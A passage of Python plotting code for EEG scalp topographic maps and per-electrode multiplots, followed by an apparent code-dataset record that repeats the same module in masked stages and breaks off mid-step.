(self.data.index <= xlim[1]))
data = self.data.ix[indices, electrodes]
min_data = data.min().min()
max_data = data.max().max()
abs_max = max(abs(min_data), max_data)
if yscale == 'linear' or yscale == 'symlog':
if min_data >= 0:
ylim = 0, max_data
else:
ylim = -abs_max, abs_max
elif yscale == 'log':
if min_data > 0:
ylim = min_data, max_data
else:
pseudo_zero = abs_max * 10 ** -5
ylim = pseudo_zero, abs_max
else:
raise ValueError('Wrong value to yscale: {}'.format(yscale))
return ylim
def draw(self, type='plot', title=None, xlim=None, ylim=None,
vmin=None, vmax=None,
axis=False, yscale='linear'):
"""Draw all components in multiplot including the data.
Parameters
----------
title : str, optional
Title to put on the plot
xlim : tuple of floats, optional
X-axis limits used for each individual plots
ylim : tuple of floats, optional
Y-axis limits used for each individual plots
"""
self.axes.axis((-1.2, 1.2, -1.2, 1.2))
self.draw_head()
self.draw_inner_head()
self.draw_nose()
self.draw_data(type=type, xlim=xlim, ylim=ylim, vmin=vmin,
vmax=vmax, axis=axis, yscale=yscale)
if title is not None:
self.axes.set_title(title)
self.yscale = yscale
def topoplot(data=None, axes=None, method='linear', number_of_contours=10,
title=None, xlim=None, ylim=None):
"""Plot topographic map of the scalp in 2-D circular view.
Draw the colored scalp map based on data in a Pandas Series where
the values are indexed according to electrode name.
Parameters
----------
data : pandas.Series or pandas.DataFrame, optional
        Series indexed by electrode names, or DataFrame with electrode-named columns.
    method : str, optional
Interpolation method
number_of_contours : int
Number of contours in the colored plot.
xlim : 2-tuple of floats, optional
Limits of x-axis in multiplot
ylim : 2-tuple of floats, optional
Limits of y-axis in multiplot
References
----------
https://github.com/compmem/ptsa/blob/master/ptsa/plotting/topo.py
http://sccn.ucsd.edu/~jung/tutorial/topoplot.htm
Examples
--------
>>> import matplotlib.pyplot as plt
>>> data = {'O1': 1, 'O2': 2, 'P3': -2, 'P4': -4}
>>> plt.ion()
>>> topo_plot = topoplot(data)
"""
if isinstance(data, pd.Series) or isinstance(data, dict) or data is None:
topo_plot = TopoPlot(data=data, axes=axes)
topo_plot.draw(title=title, method=method,
number_of_contours=number_of_contours)
return topo_plot
elif isinstance(data, pd.DataFrame):
multi_plot = MultiPlot(data=data, axes=axes)
multi_plot.draw(title=title, xlim=xlim, ylim=ylim)
return multi_plot
def show():
"""Show plot."""
plt.show()
def main(args):
"""Handle command-line interface to topographic plot."""
xlim = args['--xlim']
if args['--xlim'] is not None:
xlim = [float(lim) for lim in xlim.split(',')]
if args['<file>'] is None:
topoplot()
else:
filename = args['<file>']
if filename.lower().endswith('.csv'):
from .core import read_csv
df = read_csv(filename, index_col=0)
if args['--transpose']:
df = df.T
if args['--sample-index'] is None:
if args['--center'] is not None:
df = df.center()
topoplot(df, xlim=xlim)
else:
sample_index = int(args['--sample-index'])
series = df.iloc[sample_index - 1, :]
topoplot(series)
else:
exit('Only csv files handled')
plt.show()
if __name__ == '__main__':
from docopt import docopt
main(docopt(__doc__))
|
normal
|
{
"blob_id": "5bd7160b6b2e283e221aeb0a6913e6d13511c1db",
"index": 7073,
"step-1": "<mask token>\n\n\nclass TopoPlot(object):\n <mask token>\n\n def __init__(self, data=None, axes=None):\n \"\"\"Setup defaults.\n\n Parameters\n ----------\n data : Pandas.Series or dict\n Pandas Series with values indexed by electrodes.\n axes : matplotlib.axes.AxesSubplot object\n Axis object to render on.\n\n \"\"\"\n if axes is None:\n self.figure = plt.figure()\n axes = self.figure.gca()\n else:\n self.figure = axes.get_figure()\n self.axes = axes\n self.center = np.array((0, 0))\n if isinstance(data, dict):\n self.data = pd.Series(data)\n elif isinstance(data, pd.Series):\n self.data = data\n elif data is None:\n self.data = None\n else:\n raise ValueError(\"Wrong type of value for 'data': {}\".format(\n type(data)))\n <mask token>\n\n def draw_electrodes(self):\n \"\"\"Draw electrodes.\"\"\"\n for electrode, position in ELECTRODES.items():\n circle = plt.Circle(self.center + position, radius=0.04, fill=\n True, facecolor=(1, 1, 1))\n self.axes.add_patch(circle)\n position = self.center + position\n self.axes.text(position[0], position[1], electrode,\n verticalalignment='center', horizontalalignment='center',\n size=6)\n\n def draw_head(self):\n \"\"\"Draw outer head.\"\"\"\n circle = plt.Circle(self.center, radius=1, fill=False)\n self.axes.add_patch(circle)\n <mask token>\n <mask token>\n\n def draw_data(self, method='linear', number_of_contours=10):\n \"\"\"Draw countours from provided data.\"\"\"\n if self.data is not None:\n xi, yi = np.mgrid[-1:1:100.0j, -1:1:100.0j]\n points = []\n for electrode in self.data.index:\n name = TopoPlot.normalize_electrode_name(electrode)\n points.append(ELECTRODES[name])\n zi = griddata(points, self.data.values, (xi, yi), method=method)\n if number_of_contours is None:\n number_of_contours = 10\n plt.contourf(xi, yi, zi, number_of_contours)\n\n def draw(self, title=None, method='linear', number_of_contours=None):\n \"\"\"Draw all components in topoplot including the data.\n\n Parameters\n ----------\n title : str, optional\n Title to put on the plot\n methods : str, optional\n Interpolation method\n number_of_contours : int\n Number of contours in the colored plot.\n\n Examples\n --------\n >>> import matplotlib.pyplot as plt\n >>> data = {'O1': 1, 'O2': 2, 'P3': -2, 'P4': -4}\n >>> plt.ion()\n >>> topo_plot = TopoPlot(data)\n >>> topo_plot.draw()\n\n \"\"\"\n self.draw_head()\n self.draw_inner_head()\n self.draw_electrodes()\n self.draw_nose()\n self.draw_data(method=method, number_of_contours=number_of_contours)\n self.axes.axis((-1.2, 1.2, -1.2, 1.2))\n self.axes.axis('equal')\n if title is not None:\n self.axes.set_title(title)\n\n\nclass MultiPlot(TopoPlot):\n \"\"\"Multiple plots organized topographically.\n\n References\n ----------\n http://www.fieldtriptoolbox.org/reference/ft_multiploter\n\n \"\"\"\n\n def __init__(self, data=None, axes=None, xlim=None, ylim=None):\n \"\"\"Setup defaults.\n\n Parameters\n ----------\n data : Pandas.DataFrame\n Pandas DataFrame with values indexed by electrodes.\n axes : matplotlib.axes.AxesSubplot object\n Axis object to render on.\n\n \"\"\"\n if axes is None:\n self.figure = plt.figure()\n axes = self.figure.gca()\n else:\n self.figure = axes.get_figure()\n self.axes = axes\n self._subaxes = []\n self.xlim = xlim\n self.ylim = ylim\n self.center = np.array((0, 0))\n if isinstance(data, pd.DataFrame):\n self.data = data\n elif data is None:\n self.data = None\n else:\n raise ValueError(\"Wrong type of value for 'data': {}\".format(\n type(data)))\n\n def add_subplot_axes(self, ax, rect, 
axis_bgcolor=None):\n \"\"\"Add subaxes to currect specified axes.\n\n References\n ----------\n Pablo https://stackoverflow.com/users/2309442/pablo\n\n Pablo's answer to \"Embedding small plots inside subplots in matplotlib\"\n https://stackoverflow.com/questions/17458580/\n\n \"\"\"\n box = ax.get_position()\n width, height = box.width, box.height\n subaxes_box = [(rect[0], rect[1]), (rect[0] + rect[2], rect[1] +\n rect[3])]\n subaxes_display_coords = ax.transData.transform(subaxes_box)\n trans_figure = self.figure.transFigure.inverted()\n subaxes_figure_coords = trans_figure.transform(subaxes_display_coords)\n x, y = subaxes_figure_coords[0, :]\n width, height = subaxes_figure_coords[1, :] - subaxes_figure_coords[\n 0, :]\n subaxes = self.figure.add_axes([x, y, width, height], axis_bgcolor=\n axis_bgcolor)\n x_labelsize = subaxes.get_xticklabels()[0].get_size()\n y_labelsize = subaxes.get_yticklabels()[0].get_size()\n x_labelsize *= rect[2] ** 0.5\n y_labelsize *= rect[3] ** 0.5\n subaxes.xaxis.set_tick_params(labelsize=x_labelsize)\n subaxes.yaxis.set_tick_params(labelsize=y_labelsize)\n return subaxes\n\n def draw_data(self, type='plot', width=None, height=None, xlim=None,\n ylim=None, vmin=None, vmax=None, axis=False, yscale='linear'):\n \"\"\"Draw data.\n\n Parameters\n ----------\n type : 'plot', 'spectrogram', optional\n Type of plot\n xlim : 2-tuple of floats, optional\n X-axis limits\n ylim : 2-tuple of floats, optional\n Y-axis limits\n vmin : float, optional\n Minimum value for spectrogram colormap\n vmax : float, optional\n Maximum value for spectrogram colormap\n axis : bool, optional\n Determine whether the axis should be shown\n\n \"\"\"\n if self.data is not None:\n if ylim is None:\n if self.ylim is None and type != 'spectrogram':\n ylim = self.auto_ylim(xlim, yscale=yscale)\n else:\n ylim = self.ylim\n if xlim is None:\n xlim = self.xlim\n if vmin is None:\n vmin = 0\n number_of_electrodes = len([electrode for electrode in self.\n data.columns if electrode in ELECTRODES])\n if width is None:\n if number_of_electrodes > 32:\n width = 0.15\n else:\n width = 0.25\n if height is None:\n height = 0.25\n for electrode in self.data.columns:\n if electrode in ELECTRODES:\n x, y = ELECTRODES[electrode]\n subaxes = self.add_subplot_axes(self.axes, [x - width /\n 2, y - height / 2, width, height], axis_bgcolor='w')\n if type == 'plot':\n self.data.ix[:, electrode].plot(ax=subaxes, xlim=\n xlim, ylim=ylim)\n if not axis:\n trans = transforms.blended_transform_factory(\n subaxes.transAxes, subaxes.transData)\n line = lines.Line2D((0, 1), (0, 0), transform=\n trans, color=(0, 0, 0))\n subaxes.add_line(line)\n trans = transforms.blended_transform_factory(\n subaxes.transAxes, subaxes.transAxes)\n line = lines.Line2D((0, 0), (0, 1), transform=\n trans, color=(0, 0, 0))\n subaxes.add_line(line)\n elif type == 'spectrogram':\n spectrum, frequencies, midpoints, axes = plt.specgram(\n self.data.ix[:, electrode], Fs=self.data.\n sampling_rate, vmin=vmin, vmax=vmax, axes=subaxes)\n if xlim is None:\n xlim = midpoints[0], midpoints[-1]\n subaxes.set_xlim(xlim)\n if ylim is None:\n ylim = frequencies[0], frequencies[-1]\n subaxes.set_ylim(ylim)\n else:\n raise ValueError(\"Wrong value for 'type' argument\")\n if not axis:\n subaxes.set_axis_off()\n subaxes.text(0.5, 0.95, electrode, transform=subaxes.\n transAxes, fontweight='bold', va='top', ha='center')\n subaxes.set_yticklabels([])\n subaxes.set_xticklabels([])\n self._subaxes.append(subaxes)\n\n @property\n def xlim(self):\n \"\"\"Return 
xlim for subplots.\"\"\"\n lim = [ax.get_xlim() for ax in self._subaxes]\n if lim == []:\n lim = None\n return lim\n\n @xlim.setter\n def xlim(self, left=None, right=None):\n \"\"\"Set x-axis limits on all subplots.\"\"\"\n for ax in self._subaxes:\n ax.set_xlim(left, right)\n self.figure.canvas.draw()\n\n @property\n def ylim(self):\n \"\"\"Return ylim for subplots.\"\"\"\n lim = [ax.get_ylim() for ax in self._subaxes]\n if lim == []:\n lim = None\n return lim\n\n @ylim.setter\n def ylim(self, bottom=None, top=None):\n \"\"\"Set y-axis limits on all subplots.\"\"\"\n for ax in self._subaxes:\n ax.set_ylim(bottom, top)\n self.figure.canvas.draw()\n\n @property\n def yscale(self):\n \"\"\"Return yscale for subplots.\"\"\"\n yscales = [ax.get_yscale() for ax in self._subaxes]\n return yscales\n\n @yscale.setter\n def yscale(self, value='linear'):\n \"\"\"Set y-axis limits on all subplots.\"\"\"\n for ax in self._subaxes:\n ax.set_yscale(value)\n self.figure.canvas.draw()\n\n def auto_ylim(self, xlim=None, yscale='linear'):\n \"\"\"Return an estimate for a good ylim.\n\n Parameters\n ----------\n xlim : 2-tuple, optional\n Limits in (the index of) the data from where the scaling should be\n computed.\n yscale : linear or log, optional\n Scaling of y-axis.\n\n \"\"\"\n electrodes = [col for col in self.data.columns if col in ELECTRODES]\n if xlim is None:\n data = self.data.ix[:, electrodes]\n else:\n indices = (self.data.index >= xlim[0]) & (self.data.index <=\n xlim[1])\n data = self.data.ix[indices, electrodes]\n min_data = data.min().min()\n max_data = data.max().max()\n abs_max = max(abs(min_data), max_data)\n if yscale == 'linear' or yscale == 'symlog':\n if min_data >= 0:\n ylim = 0, max_data\n else:\n ylim = -abs_max, abs_max\n elif yscale == 'log':\n if min_data > 0:\n ylim = min_data, max_data\n else:\n pseudo_zero = abs_max * 10 ** -5\n ylim = pseudo_zero, abs_max\n else:\n raise ValueError('Wrong value to yscale: {}'.format(yscale))\n return ylim\n\n def draw(self, type='plot', title=None, xlim=None, ylim=None, vmin=None,\n vmax=None, axis=False, yscale='linear'):\n \"\"\"Draw all components in multiplot including the data.\n\n Parameters\n ----------\n title : str, optional\n Title to put on the plot\n xlim : tuple of floats, optional\n X-axis limits used for each individual plots\n ylim : tuple of floats, optional\n Y-axis limits used for each individual plots\n\n \"\"\"\n self.axes.axis((-1.2, 1.2, -1.2, 1.2))\n self.draw_head()\n self.draw_inner_head()\n self.draw_nose()\n self.draw_data(type=type, xlim=xlim, ylim=ylim, vmin=vmin, vmax=\n vmax, axis=axis, yscale=yscale)\n if title is not None:\n self.axes.set_title(title)\n self.yscale = yscale\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass TopoPlot(object):\n <mask token>\n\n def __init__(self, data=None, axes=None):\n \"\"\"Setup defaults.\n\n Parameters\n ----------\n data : Pandas.Series or dict\n Pandas Series with values indexed by electrodes.\n axes : matplotlib.axes.AxesSubplot object\n Axis object to render on.\n\n \"\"\"\n if axes is None:\n self.figure = plt.figure()\n axes = self.figure.gca()\n else:\n self.figure = axes.get_figure()\n self.axes = axes\n self.center = np.array((0, 0))\n if isinstance(data, dict):\n self.data = pd.Series(data)\n elif isinstance(data, pd.Series):\n self.data = data\n elif data is None:\n self.data = None\n else:\n raise ValueError(\"Wrong type of value for 'data': {}\".format(\n type(data)))\n\n @staticmethod\n def normalize_electrode_name(name):\n \"\"\"Normalize electrode name.\n\n Parameters\n ----------\n name : str\n Name of electrode to be normalized\n\n Examples\n --------\n >>> TopoPlot.normalize_electrode_name('fpz')\n 'Fpz'\n\n >>> TopoPlot.normalize_electrode_name('AFZ')\n 'AFz'\n\n \"\"\"\n return name.upper().replace('FPZ', 'Fpz').replace('Z', 'z')\n\n def draw_electrodes(self):\n \"\"\"Draw electrodes.\"\"\"\n for electrode, position in ELECTRODES.items():\n circle = plt.Circle(self.center + position, radius=0.04, fill=\n True, facecolor=(1, 1, 1))\n self.axes.add_patch(circle)\n position = self.center + position\n self.axes.text(position[0], position[1], electrode,\n verticalalignment='center', horizontalalignment='center',\n size=6)\n\n def draw_head(self):\n \"\"\"Draw outer head.\"\"\"\n circle = plt.Circle(self.center, radius=1, fill=False)\n self.axes.add_patch(circle)\n\n def draw_inner_head(self):\n \"\"\"Draw inner head.\"\"\"\n circle = plt.Circle(self.center, radius=0.8, fill=False)\n self.axes.add_patch(circle)\n\n def draw_nose(self):\n \"\"\"Draw nose.\"\"\"\n nose = plt.Line2D([sin(-0.1), 0, sin(0.1)], [cos(-0.1), 1.1, cos(\n 0.1)], color=(0, 0, 0))\n self.axes.add_line(nose)\n\n def draw_data(self, method='linear', number_of_contours=10):\n \"\"\"Draw countours from provided data.\"\"\"\n if self.data is not None:\n xi, yi = np.mgrid[-1:1:100.0j, -1:1:100.0j]\n points = []\n for electrode in self.data.index:\n name = TopoPlot.normalize_electrode_name(electrode)\n points.append(ELECTRODES[name])\n zi = griddata(points, self.data.values, (xi, yi), method=method)\n if number_of_contours is None:\n number_of_contours = 10\n plt.contourf(xi, yi, zi, number_of_contours)\n\n def draw(self, title=None, method='linear', number_of_contours=None):\n \"\"\"Draw all components in topoplot including the data.\n\n Parameters\n ----------\n title : str, optional\n Title to put on the plot\n methods : str, optional\n Interpolation method\n number_of_contours : int\n Number of contours in the colored plot.\n\n Examples\n --------\n >>> import matplotlib.pyplot as plt\n >>> data = {'O1': 1, 'O2': 2, 'P3': -2, 'P4': -4}\n >>> plt.ion()\n >>> topo_plot = TopoPlot(data)\n >>> topo_plot.draw()\n\n \"\"\"\n self.draw_head()\n self.draw_inner_head()\n self.draw_electrodes()\n self.draw_nose()\n self.draw_data(method=method, number_of_contours=number_of_contours)\n self.axes.axis((-1.2, 1.2, -1.2, 1.2))\n self.axes.axis('equal')\n if title is not None:\n self.axes.set_title(title)\n\n\nclass MultiPlot(TopoPlot):\n \"\"\"Multiple plots organized topographically.\n\n References\n ----------\n http://www.fieldtriptoolbox.org/reference/ft_multiploter\n\n \"\"\"\n\n def __init__(self, data=None, axes=None, xlim=None, ylim=None):\n \"\"\"Setup 
defaults.\n\n Parameters\n ----------\n data : Pandas.DataFrame\n Pandas DataFrame with values indexed by electrodes.\n axes : matplotlib.axes.AxesSubplot object\n Axis object to render on.\n\n \"\"\"\n if axes is None:\n self.figure = plt.figure()\n axes = self.figure.gca()\n else:\n self.figure = axes.get_figure()\n self.axes = axes\n self._subaxes = []\n self.xlim = xlim\n self.ylim = ylim\n self.center = np.array((0, 0))\n if isinstance(data, pd.DataFrame):\n self.data = data\n elif data is None:\n self.data = None\n else:\n raise ValueError(\"Wrong type of value for 'data': {}\".format(\n type(data)))\n\n def add_subplot_axes(self, ax, rect, axis_bgcolor=None):\n \"\"\"Add subaxes to currect specified axes.\n\n References\n ----------\n Pablo https://stackoverflow.com/users/2309442/pablo\n\n Pablo's answer to \"Embedding small plots inside subplots in matplotlib\"\n https://stackoverflow.com/questions/17458580/\n\n \"\"\"\n box = ax.get_position()\n width, height = box.width, box.height\n subaxes_box = [(rect[0], rect[1]), (rect[0] + rect[2], rect[1] +\n rect[3])]\n subaxes_display_coords = ax.transData.transform(subaxes_box)\n trans_figure = self.figure.transFigure.inverted()\n subaxes_figure_coords = trans_figure.transform(subaxes_display_coords)\n x, y = subaxes_figure_coords[0, :]\n width, height = subaxes_figure_coords[1, :] - subaxes_figure_coords[\n 0, :]\n subaxes = self.figure.add_axes([x, y, width, height], axis_bgcolor=\n axis_bgcolor)\n x_labelsize = subaxes.get_xticklabels()[0].get_size()\n y_labelsize = subaxes.get_yticklabels()[0].get_size()\n x_labelsize *= rect[2] ** 0.5\n y_labelsize *= rect[3] ** 0.5\n subaxes.xaxis.set_tick_params(labelsize=x_labelsize)\n subaxes.yaxis.set_tick_params(labelsize=y_labelsize)\n return subaxes\n\n def draw_data(self, type='plot', width=None, height=None, xlim=None,\n ylim=None, vmin=None, vmax=None, axis=False, yscale='linear'):\n \"\"\"Draw data.\n\n Parameters\n ----------\n type : 'plot', 'spectrogram', optional\n Type of plot\n xlim : 2-tuple of floats, optional\n X-axis limits\n ylim : 2-tuple of floats, optional\n Y-axis limits\n vmin : float, optional\n Minimum value for spectrogram colormap\n vmax : float, optional\n Maximum value for spectrogram colormap\n axis : bool, optional\n Determine whether the axis should be shown\n\n \"\"\"\n if self.data is not None:\n if ylim is None:\n if self.ylim is None and type != 'spectrogram':\n ylim = self.auto_ylim(xlim, yscale=yscale)\n else:\n ylim = self.ylim\n if xlim is None:\n xlim = self.xlim\n if vmin is None:\n vmin = 0\n number_of_electrodes = len([electrode for electrode in self.\n data.columns if electrode in ELECTRODES])\n if width is None:\n if number_of_electrodes > 32:\n width = 0.15\n else:\n width = 0.25\n if height is None:\n height = 0.25\n for electrode in self.data.columns:\n if electrode in ELECTRODES:\n x, y = ELECTRODES[electrode]\n subaxes = self.add_subplot_axes(self.axes, [x - width /\n 2, y - height / 2, width, height], axis_bgcolor='w')\n if type == 'plot':\n self.data.ix[:, electrode].plot(ax=subaxes, xlim=\n xlim, ylim=ylim)\n if not axis:\n trans = transforms.blended_transform_factory(\n subaxes.transAxes, subaxes.transData)\n line = lines.Line2D((0, 1), (0, 0), transform=\n trans, color=(0, 0, 0))\n subaxes.add_line(line)\n trans = transforms.blended_transform_factory(\n subaxes.transAxes, subaxes.transAxes)\n line = lines.Line2D((0, 0), (0, 1), transform=\n trans, color=(0, 0, 0))\n subaxes.add_line(line)\n elif type == 'spectrogram':\n spectrum, 
frequencies, midpoints, axes = plt.specgram(\n self.data.ix[:, electrode], Fs=self.data.\n sampling_rate, vmin=vmin, vmax=vmax, axes=subaxes)\n if xlim is None:\n xlim = midpoints[0], midpoints[-1]\n subaxes.set_xlim(xlim)\n if ylim is None:\n ylim = frequencies[0], frequencies[-1]\n subaxes.set_ylim(ylim)\n else:\n raise ValueError(\"Wrong value for 'type' argument\")\n if not axis:\n subaxes.set_axis_off()\n subaxes.text(0.5, 0.95, electrode, transform=subaxes.\n transAxes, fontweight='bold', va='top', ha='center')\n subaxes.set_yticklabels([])\n subaxes.set_xticklabels([])\n self._subaxes.append(subaxes)\n\n @property\n def xlim(self):\n \"\"\"Return xlim for subplots.\"\"\"\n lim = [ax.get_xlim() for ax in self._subaxes]\n if lim == []:\n lim = None\n return lim\n\n @xlim.setter\n def xlim(self, left=None, right=None):\n \"\"\"Set x-axis limits on all subplots.\"\"\"\n for ax in self._subaxes:\n ax.set_xlim(left, right)\n self.figure.canvas.draw()\n\n @property\n def ylim(self):\n \"\"\"Return ylim for subplots.\"\"\"\n lim = [ax.get_ylim() for ax in self._subaxes]\n if lim == []:\n lim = None\n return lim\n\n @ylim.setter\n def ylim(self, bottom=None, top=None):\n \"\"\"Set y-axis limits on all subplots.\"\"\"\n for ax in self._subaxes:\n ax.set_ylim(bottom, top)\n self.figure.canvas.draw()\n\n @property\n def yscale(self):\n \"\"\"Return yscale for subplots.\"\"\"\n yscales = [ax.get_yscale() for ax in self._subaxes]\n return yscales\n\n @yscale.setter\n def yscale(self, value='linear'):\n \"\"\"Set y-axis limits on all subplots.\"\"\"\n for ax in self._subaxes:\n ax.set_yscale(value)\n self.figure.canvas.draw()\n\n def auto_ylim(self, xlim=None, yscale='linear'):\n \"\"\"Return an estimate for a good ylim.\n\n Parameters\n ----------\n xlim : 2-tuple, optional\n Limits in (the index of) the data from where the scaling should be\n computed.\n yscale : linear or log, optional\n Scaling of y-axis.\n\n \"\"\"\n electrodes = [col for col in self.data.columns if col in ELECTRODES]\n if xlim is None:\n data = self.data.ix[:, electrodes]\n else:\n indices = (self.data.index >= xlim[0]) & (self.data.index <=\n xlim[1])\n data = self.data.ix[indices, electrodes]\n min_data = data.min().min()\n max_data = data.max().max()\n abs_max = max(abs(min_data), max_data)\n if yscale == 'linear' or yscale == 'symlog':\n if min_data >= 0:\n ylim = 0, max_data\n else:\n ylim = -abs_max, abs_max\n elif yscale == 'log':\n if min_data > 0:\n ylim = min_data, max_data\n else:\n pseudo_zero = abs_max * 10 ** -5\n ylim = pseudo_zero, abs_max\n else:\n raise ValueError('Wrong value to yscale: {}'.format(yscale))\n return ylim\n\n def draw(self, type='plot', title=None, xlim=None, ylim=None, vmin=None,\n vmax=None, axis=False, yscale='linear'):\n \"\"\"Draw all components in multiplot including the data.\n\n Parameters\n ----------\n title : str, optional\n Title to put on the plot\n xlim : tuple of floats, optional\n X-axis limits used for each individual plots\n ylim : tuple of floats, optional\n Y-axis limits used for each individual plots\n\n \"\"\"\n self.axes.axis((-1.2, 1.2, -1.2, 1.2))\n self.draw_head()\n self.draw_inner_head()\n self.draw_nose()\n self.draw_data(type=type, xlim=xlim, ylim=ylim, vmin=vmin, vmax=\n vmax, axis=axis, yscale=yscale)\n if title is not None:\n self.axes.set_title(title)\n self.yscale = yscale\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass TopoPlot(object):\n \"\"\"Topographic plot.\"\"\"\n\n def __init__(self, data=None, axes=None):\n \"\"\"Setup defaults.\n\n Parameters\n ----------\n data : Pandas.Series or dict\n Pandas Series with values indexed by electrodes.\n axes : matplotlib.axes.AxesSubplot object\n Axis object to render on.\n\n \"\"\"\n if axes is None:\n self.figure = plt.figure()\n axes = self.figure.gca()\n else:\n self.figure = axes.get_figure()\n self.axes = axes\n self.center = np.array((0, 0))\n if isinstance(data, dict):\n self.data = pd.Series(data)\n elif isinstance(data, pd.Series):\n self.data = data\n elif data is None:\n self.data = None\n else:\n raise ValueError(\"Wrong type of value for 'data': {}\".format(\n type(data)))\n\n @staticmethod\n def normalize_electrode_name(name):\n \"\"\"Normalize electrode name.\n\n Parameters\n ----------\n name : str\n Name of electrode to be normalized\n\n Examples\n --------\n >>> TopoPlot.normalize_electrode_name('fpz')\n 'Fpz'\n\n >>> TopoPlot.normalize_electrode_name('AFZ')\n 'AFz'\n\n \"\"\"\n return name.upper().replace('FPZ', 'Fpz').replace('Z', 'z')\n\n def draw_electrodes(self):\n \"\"\"Draw electrodes.\"\"\"\n for electrode, position in ELECTRODES.items():\n circle = plt.Circle(self.center + position, radius=0.04, fill=\n True, facecolor=(1, 1, 1))\n self.axes.add_patch(circle)\n position = self.center + position\n self.axes.text(position[0], position[1], electrode,\n verticalalignment='center', horizontalalignment='center',\n size=6)\n\n def draw_head(self):\n \"\"\"Draw outer head.\"\"\"\n circle = plt.Circle(self.center, radius=1, fill=False)\n self.axes.add_patch(circle)\n\n def draw_inner_head(self):\n \"\"\"Draw inner head.\"\"\"\n circle = plt.Circle(self.center, radius=0.8, fill=False)\n self.axes.add_patch(circle)\n\n def draw_nose(self):\n \"\"\"Draw nose.\"\"\"\n nose = plt.Line2D([sin(-0.1), 0, sin(0.1)], [cos(-0.1), 1.1, cos(\n 0.1)], color=(0, 0, 0))\n self.axes.add_line(nose)\n\n def draw_data(self, method='linear', number_of_contours=10):\n \"\"\"Draw countours from provided data.\"\"\"\n if self.data is not None:\n xi, yi = np.mgrid[-1:1:100.0j, -1:1:100.0j]\n points = []\n for electrode in self.data.index:\n name = TopoPlot.normalize_electrode_name(electrode)\n points.append(ELECTRODES[name])\n zi = griddata(points, self.data.values, (xi, yi), method=method)\n if number_of_contours is None:\n number_of_contours = 10\n plt.contourf(xi, yi, zi, number_of_contours)\n\n def draw(self, title=None, method='linear', number_of_contours=None):\n \"\"\"Draw all components in topoplot including the data.\n\n Parameters\n ----------\n title : str, optional\n Title to put on the plot\n methods : str, optional\n Interpolation method\n number_of_contours : int\n Number of contours in the colored plot.\n\n Examples\n --------\n >>> import matplotlib.pyplot as plt\n >>> data = {'O1': 1, 'O2': 2, 'P3': -2, 'P4': -4}\n >>> plt.ion()\n >>> topo_plot = TopoPlot(data)\n >>> topo_plot.draw()\n\n \"\"\"\n self.draw_head()\n self.draw_inner_head()\n self.draw_electrodes()\n self.draw_nose()\n self.draw_data(method=method, number_of_contours=number_of_contours)\n self.axes.axis((-1.2, 1.2, -1.2, 1.2))\n self.axes.axis('equal')\n if title is not None:\n self.axes.set_title(title)\n\n\nclass MultiPlot(TopoPlot):\n \"\"\"Multiple plots organized topographically.\n\n References\n ----------\n http://www.fieldtriptoolbox.org/reference/ft_multiploter\n\n \"\"\"\n\n def __init__(self, data=None, axes=None, xlim=None, ylim=None):\n 
\"\"\"Setup defaults.\n\n Parameters\n ----------\n data : Pandas.DataFrame\n Pandas DataFrame with values indexed by electrodes.\n axes : matplotlib.axes.AxesSubplot object\n Axis object to render on.\n\n \"\"\"\n if axes is None:\n self.figure = plt.figure()\n axes = self.figure.gca()\n else:\n self.figure = axes.get_figure()\n self.axes = axes\n self._subaxes = []\n self.xlim = xlim\n self.ylim = ylim\n self.center = np.array((0, 0))\n if isinstance(data, pd.DataFrame):\n self.data = data\n elif data is None:\n self.data = None\n else:\n raise ValueError(\"Wrong type of value for 'data': {}\".format(\n type(data)))\n\n def add_subplot_axes(self, ax, rect, axis_bgcolor=None):\n \"\"\"Add subaxes to currect specified axes.\n\n References\n ----------\n Pablo https://stackoverflow.com/users/2309442/pablo\n\n Pablo's answer to \"Embedding small plots inside subplots in matplotlib\"\n https://stackoverflow.com/questions/17458580/\n\n \"\"\"\n box = ax.get_position()\n width, height = box.width, box.height\n subaxes_box = [(rect[0], rect[1]), (rect[0] + rect[2], rect[1] +\n rect[3])]\n subaxes_display_coords = ax.transData.transform(subaxes_box)\n trans_figure = self.figure.transFigure.inverted()\n subaxes_figure_coords = trans_figure.transform(subaxes_display_coords)\n x, y = subaxes_figure_coords[0, :]\n width, height = subaxes_figure_coords[1, :] - subaxes_figure_coords[\n 0, :]\n subaxes = self.figure.add_axes([x, y, width, height], axis_bgcolor=\n axis_bgcolor)\n x_labelsize = subaxes.get_xticklabels()[0].get_size()\n y_labelsize = subaxes.get_yticklabels()[0].get_size()\n x_labelsize *= rect[2] ** 0.5\n y_labelsize *= rect[3] ** 0.5\n subaxes.xaxis.set_tick_params(labelsize=x_labelsize)\n subaxes.yaxis.set_tick_params(labelsize=y_labelsize)\n return subaxes\n\n def draw_data(self, type='plot', width=None, height=None, xlim=None,\n ylim=None, vmin=None, vmax=None, axis=False, yscale='linear'):\n \"\"\"Draw data.\n\n Parameters\n ----------\n type : 'plot', 'spectrogram', optional\n Type of plot\n xlim : 2-tuple of floats, optional\n X-axis limits\n ylim : 2-tuple of floats, optional\n Y-axis limits\n vmin : float, optional\n Minimum value for spectrogram colormap\n vmax : float, optional\n Maximum value for spectrogram colormap\n axis : bool, optional\n Determine whether the axis should be shown\n\n \"\"\"\n if self.data is not None:\n if ylim is None:\n if self.ylim is None and type != 'spectrogram':\n ylim = self.auto_ylim(xlim, yscale=yscale)\n else:\n ylim = self.ylim\n if xlim is None:\n xlim = self.xlim\n if vmin is None:\n vmin = 0\n number_of_electrodes = len([electrode for electrode in self.\n data.columns if electrode in ELECTRODES])\n if width is None:\n if number_of_electrodes > 32:\n width = 0.15\n else:\n width = 0.25\n if height is None:\n height = 0.25\n for electrode in self.data.columns:\n if electrode in ELECTRODES:\n x, y = ELECTRODES[electrode]\n subaxes = self.add_subplot_axes(self.axes, [x - width /\n 2, y - height / 2, width, height], axis_bgcolor='w')\n if type == 'plot':\n self.data.ix[:, electrode].plot(ax=subaxes, xlim=\n xlim, ylim=ylim)\n if not axis:\n trans = transforms.blended_transform_factory(\n subaxes.transAxes, subaxes.transData)\n line = lines.Line2D((0, 1), (0, 0), transform=\n trans, color=(0, 0, 0))\n subaxes.add_line(line)\n trans = transforms.blended_transform_factory(\n subaxes.transAxes, subaxes.transAxes)\n line = lines.Line2D((0, 0), (0, 1), transform=\n trans, color=(0, 0, 0))\n subaxes.add_line(line)\n elif type == 'spectrogram':\n 
